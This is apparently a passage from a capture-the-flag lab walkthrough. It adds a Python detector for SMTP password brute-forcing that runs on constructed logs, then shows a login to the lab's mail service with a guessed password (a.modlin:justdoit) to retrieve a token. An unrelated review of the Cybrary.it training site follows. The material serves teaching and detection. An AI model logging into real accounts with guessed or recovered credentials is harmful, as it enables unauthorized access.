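The Hydra status lines above show what the attacker's side of this looks like: a single source hammering TCP/25 at roughly 215 tries a minute, cycling through three usernames, and eventually getting one right. From the mail server's side that is a very loud pattern. The following is an added example (mine, not from the original walkthrough or the lab) of the detection logic that catches it: it parses constructed auth-log lines in a simplified format I made up for the example, counts failures per source IP in a sliding window, records how many distinct usernames a source tried, and notes when a flagged source later logs in successfully, which is the signature of a guessed password. The username a.modlin is the one found above; j.smith and r.doe are placeholders for the other two names on the contact page.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta


# Constructed sample (not from the lab or the post): a simplified mail-server
# auth log. j.smith and r.doe are placeholder usernames.
def constructed_log():
    lines = []
    base = datetime(2017, 3, 17, 17, 47, 0)
    users = ["a.modlin", "j.smith", "r.doe"]
    # 15 failures in 56 seconds from one source, cycling through the user list
    for i in range(15):
        ts = (base + timedelta(seconds=4 * i)).strftime("%b %d %H:%M:%S")
        lines.append(f"{ts} mail smtpd[4242]: auth failure from 192.0.2.10 user={users[i % 3]}")
    # two failures from another source: someone mistyping their own password
    for i in range(2):
        ts = (base + timedelta(seconds=30 + 10 * i)).strftime("%b %d %H:%M:%S")
        lines.append(f"{ts} mail smtpd[4242]: auth failure from 198.51.100.7 user=j.smith")
    # the noisy source then logs in successfully: the signature of a guessed password
    ts = (base + timedelta(seconds=60)).strftime("%b %d %H:%M:%S")
    lines.append(f"{ts} mail smtpd[4242]: auth success from 192.0.2.10 user=a.modlin")
    return lines


LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ smtpd\[\d+\]: "
    r"auth (?P<result>failure|success) from (?P<ip>[\d.]+) user=(?P<user>\S+)$"
)


def parse_events(lines):
    """Turn matching log lines into (timestamp, ip, user, result), sorted by time."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an auth line
        # syslog timestamps carry no year; only differences between them are used
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"]))
    events.sort(key=lambda e: e[0])
    return events


def detect_bruteforce(lines, window=timedelta(seconds=60), threshold=10):
    """Flag any source IP with >= threshold auth failures inside a sliding window.

    Each alert records the peak failure count, the set of usernames tried
    (a wide set from one IP is the mark of a list-driven attack), and the
    user of any success from that IP that followed the burst.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps inside the window
    tried = defaultdict(set)      # ip -> usernames seen in failures
    alerts = {}
    for ts, ip, user, result in parse_events(lines):
        if result == "failure":
            q = recent[ip]
            q.append(ts)
            tried[ip].add(user)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "users": set(),
                                           "success_after": None})
                a["failures"] = max(a["failures"], len(q))
                a["users"] = set(tried[ip])
        elif ip in alerts:  # a success from an already-flagged source
            alerts[ip]["success_after"] = user
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(constructed_log()).items():
        print(ip, alert)
```

A threshold of ten failures per minute from one source is far below the rate Hydra shows above, while the two-failure source (a user mistyping a password) stays under it; the "success after burst" field is what turns a noise alert into an account-compromise alert worth paging on.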

Finding the Mail Token:

We can access the CommuniGate Pro e-mail service on TCP/8100.

8100 – login screen

Once there, let’s log in with a.modlin:justdoit and see if we have access.

a.modlin email


Bingo! We see that Alfred has two emails, one with the Token, and another one with some kind of App.

Let’s take a look and see what the app is; it might be useful.

a.modlin MAIL – app


The email also gives us some extra information about the network. We now know that there is only one SSH port at and that the app will allow us to see if (the .apk is attached).

I believe we will need it for later exploitation purposes, so let’s save that!

Token (1/13):

We found the token! Go ahead and submit it on the main page to gain points for it!

I didn’t post the actual token, because what would be the fun in that? Go through and actually try to compromise the SMTP service to get the token!

Mail Token complete

You learn by practical work, so go through this walkthrough and the lab, and learn something new!

That’s all for now, stay tuned for the next post to compromise the next Token (2/13) – The Site Token!


Cybrary.it – The Review

In the IT world, there seems to be always a need for certified and/or experienced IT professionals. Cybrary.it is an online resource dedicated to helping people who are interested in this field get the training they need to start or grow their expertise in the IT industry.

All training courses are completely FREE. The site runs off of donations (both financially and through materials) from users and partners/sponsors.

I have personally used cybrary.it and intend to continue. I wouldn’t say it is the one-stop learning location for all IT certifications, but it gets very close. The courses offered, from basic CompTIA A+ to CISSP and advanced hacking, are all well in depth and follow the structure of the exam criteria.

I also have completed the PCI/DSS, A+ and ITIL Foundation courses and parts of other courses. In my opinion the PCI/DSS course was probably the least extensive one that I have come across during my use (and I’ve been involved with cybrary.it for over a year at this point). Even so, I’d call it a good primer, as it exposes the watcher to the basics of the PCI fundamentals, gives a crash course in many of the most used policies, and speaks on using risk management and information security. …and all of this is for FREE. In addition, members of Cybrary have been writing articles that go into additional topics that are accessible to any registered cybrary.it user.

Registration is free just like the course material, and the setup includes creating your own profile. Cybrary.it isn’t just a learning source; it’s a community, and I’ve seen it grow from just courses and a forum to include hours of reading content submitted by users and companies, a job board, current IT developments, micro certifications and more.

There is much more I could comment on, but I don’t want to make this review too lengthy. Perhaps I’ll do another later on a specific element of the site. Regardless of what I choose to do, I know I’ll continue to use cybrary.it extensively for my training needs. I am currently eyeing Security+ and CCNA.

I challenge you to take a look. There is much more material and training for the IT industry’s needs there than I could list here in compact form. So take a look! I’m sure you’ll find something useful.